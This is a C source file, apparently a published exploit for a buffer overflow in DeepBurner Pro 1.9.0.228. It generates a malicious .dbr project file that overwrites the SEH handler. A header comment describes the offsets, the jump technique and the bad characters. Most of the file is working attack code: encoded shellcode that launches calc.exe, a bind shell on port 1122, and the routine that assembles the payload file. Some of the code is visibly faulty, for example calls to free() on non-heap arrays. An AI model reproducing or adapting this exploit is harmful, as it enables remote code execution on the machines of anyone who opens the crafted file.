|
/* Deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)
[~]This is buffer: {[header] 253 bytes + (junk+ next seh + seh addr) + [tail] 957 bytes} dbr/dbi file
[~]Date: 29.01.2010
[~]Dicovery Credits: fl0 fl0w
[~]Exploit Credits : fl0 fl0w
[?]Download latest vuln vs from: http://www.deepburner.com/?r=download
[?]Compilation: deepburner.c.......Win32(cygwin,Devcpp)
[!]How do I exploit this? well overwriting a seh handler ,the offset is at 529 bytes from the beggining
of my buffer, nseh is at seh-4 bytes whitch a overwrite with a jmp instruction ,after I reposition my
payload in memory(seh->pop/pop/ret | nseh->jmp 9 bytes).
[!]Alternative solution, ESI points somewhere's in memory that I control,so theoretically you could do the
following: pop esi
pop edi
retn
call esi
The problem is that ESI address keeps changing ,I tryed to guess a interval ,as it seems the probablity of
guessing a right address is low aldo this vs of the exploit works 100% every time.
Overwrite seh handler address with pop/pop/retn ,retn instr gets EIP to point to next instruction witch is
the address that next seh handler points to witch will be the address that ESI points to resulting in code execution.
[!]When u generate shellcode make sure to avoid these caracters: 0x00 0x3c 0x3e 0x0a 0x0d 0x22 0x2F.
[!] */
#include<stdio.h>
#include<string.h>
void gen_random(char*,const int);
void cpy_eip(char*,int,unsigned int);
unsigned int getFsize(FILE*,char*);
int cpy(char*,char*);
void print(char*);
void buildfile(char*);
void banner();
void shellprint();
#define VER "1.9.0.228"
#define POCNAME "deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)"
#define AUTHOR "fl0 fl0w"
#define VULNF "testfile.dbr"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define WHILE(z) while(z>0)
#define SEH_OFFSET 276
#define NEXTSEH_OFFSET 272
char dbrheader[]={
0x3C, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65, 0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F,
0x72, 0x64, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x2E, 0x38, 0x2E, 0x30, 0x2E, 0x32, 0x32,
0x34, 0x22, 0x20, 0x74, 0x79, 0x70, 0x65, 0x3D, 0x22, 0x64, 0x61, 0x74, 0x61, 0x22, 0x3E, 0x2E,
0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x20,
0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x64, 0x65, 0x76, 0x69, 0x63, 0x65, 0x3D, 0x22,
0x22, 0x20, 0x73, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x32, 0x69, 0x6D, 0x70, 0x6F, 0x72, 0x74,
0x3D, 0x22, 0x30, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F, 0x64, 0x69,
0x73, 0x63, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F,
0x74, 0x72, 0x61, 0x63, 0x6B, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x61, 0x62,
0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x5F, 0x69, 0x6D, 0x61, 0x67,
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x69, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x43, 0x44, 0x52, 0x6F, 0x6F, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22,
0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74, 0x65, 0x73,
0x74, 0x2E, 0x74, 0x78, 0x74, 0x22, 0x20, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22,
};
char dbrtail[]={0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x69, 0x72, 0x3E, 0x0D, 0x0D,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x3E,
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62, 0x65,
0x6C, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x7A, 0x6F, 0x6F, 0x6D, 0x3D, 0x22,
0x30, 0x22, 0x20, 0x76, 0x69, 0x65, 0x77, 0x3D, 0x22, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x74,
0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x6C,
0x61, 0x62, 0x65, 0x6C, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x66, 0x72, 0x6F, 0x6E, 0x74, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x62, 0x61, 0x63, 0x6B, 0x20, 0x2F, 0x3E,
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62,
0x65, 0x6C, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x61, 0x75, 0x74, 0x6F,
0x72, 0x75, 0x6E, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x75, 0x73, 0x65, 0x3D,
0x22, 0x30, 0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x3C, 0x6D, 0x61, 0x69, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x61, 0x69, 0x6E,
0x46, 0x6F, 0x72, 0x6D, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F, 0x70, 0x61, 0x74, 0x68,
0x3D, 0x22, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x74, 0x69, 0x74, 0x6C, 0x65,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x74, 0x65,
0x78, 0x74, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D,
0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x20, 0x62, 0x6F, 0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74,
0x3D, 0x22, 0x31, 0x34, 0x34, 0x22, 0x20, 0x74, 0x6F, 0x70, 0x3D, 0x22, 0x34, 0x38, 0x22, 0x20,
0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x35, 0x37, 0x22, 0x20, 0x68, 0x65, 0x69, 0x67, 0x68,
0x74, 0x3D, 0x22, 0x33, 0x33, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E,
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22, 0x32, 0x30, 0x22, 0x20,
0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35, 0x35, 0x22, 0x20,
0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x22,
0x20, 0x74, 0x65, 0x78, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x22, 0x20,
0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x20, 0x62, 0x6F,
0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x34, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
0x3D, 0x22, 0x37, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x38, 0x39, 0x22,
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x39, 0x22, 0x20, 0x66, 0x6F, 0x6E,
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77,
0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65,
0x3D, 0x22, 0x31, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D,
0x22, 0x32, 0x35, 0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31,
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x65,
0x78, 0x69, 0x74, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67,
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F,
0x64, 0x6F, 0x77, 0x6E, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x74, 0x65, 0x78,
0x74, 0x3D, 0x22, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x45,
0x78, 0x69, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D,
0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x31, 0x32, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
0x3D, 0x22, 0x39, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x37, 0x35, 0x22,
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E,
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53,
0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22,
0x38, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35,
0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66,
0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x61, 0x75, 0x74, 0x6F, 0x72, 0x75, 0x6E,
0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x3C, 0x2F, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65,
0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F, 0x72, 0x64, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
};
struct {
char* shellNAME;
int size;
char* shellTYPE;
}scode[]={ {"Execute calc.exe",164,
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" //164 bytes
"\x6b\x48\x82\x83\xeb\xfc\xe2\xf4\xf4\x83\x0c\x82\x08\x6b\xc3\xc7"
"\x34\xe0\x34\x87\x70\x6a\xa7\x09\x47\x73\xc3\xdd\x28\x6a\xa3\xcb"
"\x83\x5f\xc3\x83\xe6\x5a\x88\x1b\xa4\xef\x88\xf6\x0f\xaa\x82\x8f"
"\x09\xa9\xa3\x76\x33\x3f\x6c\x86\x7d\x8e\xc3\xdd\x2c\x6a\xa3\xe4"
"\x83\x67\x03\x09\x57\x77\x49\x69\x83\x77\xc3\x83\xe3\xe2\x14\xa6"
"\x0c\xa8\x79\x42\x6c\xe0\x08\xb2\x8d\xab\x30\x8e\x83\x2b\x44\x09"
"\x78\x77\xe5\x09\x60\x63\xa3\x8b\x83\xeb\xf8\x82\x08\x6b\xc3\xea"
"\x34\x34\x79\x74\x68\x3d\xc1\x7a\x8b\xab\x33\xd2\x60\x9b\xc2\x86"
"\x57\x03\xd0\x7c\x82\x65\x1f\x7d\xef\x08\x29\xee\x6b\x45\x2d\xfa"
"\x6d\x6b\x48\x82"
},
{ "bind shell on port 1122",709,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"},
{NULL,NULL}
};
int j;
int main(){
banner();
shellprint();
buildfile(VULNF);
print("Done!");
//sleep()
getchar();
return 0;
}
void buildfile(char* fname){
char seh[]="\xAF\x20\x36\x02";
char nseh[]="\xeb\x09\x90\x90";
scanf("%d",&j);
char buffer[1000000];
gen_random(buffer,999999);
memcpy(buffer+SEH_OFFSET,seh,4);
memcpy(buffer+NEXTSEH_OFFSET,nseh,4);
memset(buffer+SEH_OFFSET+4,0x90,10);
switch(j){
case 0:
memcpy(buffer+SEH_OFFSET+14,scode[0].shellTYPE,strlen(scode[0].shellTYPE));
break;
case 1:
memcpy(buffer+SEH_OFFSET+14,scode[1].shellTYPE,strlen(scode[1].shellTYPE));
break;
default: print("Error with shellcode");exit(0);
}
FILE* f=fopen(fname,"wb");
IF(f,NULL){ print("error writing file");exit(0);}
fprintf(f,"%s%s%s",dbrheader,buffer,dbrtail);
fclose(f);
free(dbrheader);
free(dbrtail);
free(buffer);
printf("[!]File is:%d bytes\n",getFsize(f,VULNF));
}
void banner(){
printf("[$]%s\n[$]Vs %s\n[$]%s\n",POCNAME,VER,AUTHOR);
}
void shellprint(){
int i;
print("Chose you shellcode(press 0 || 1)");
for(i=0;i<2;i++)
printf("[~]%s of %d length %d\n",scode[i].shellNAME,scode[i].size,i);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
unsigned int getFsize(FILE* g,char* gname)
{
unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;
}
int cpy(char* source,char* dest)
{
int len;
len=strlen(source);
memcpy(dest,&source,len+1);
return len;
}
void print(char* msg)
{
printf("[*]%s\n",msg);
}
|
推荐
评论(0条)
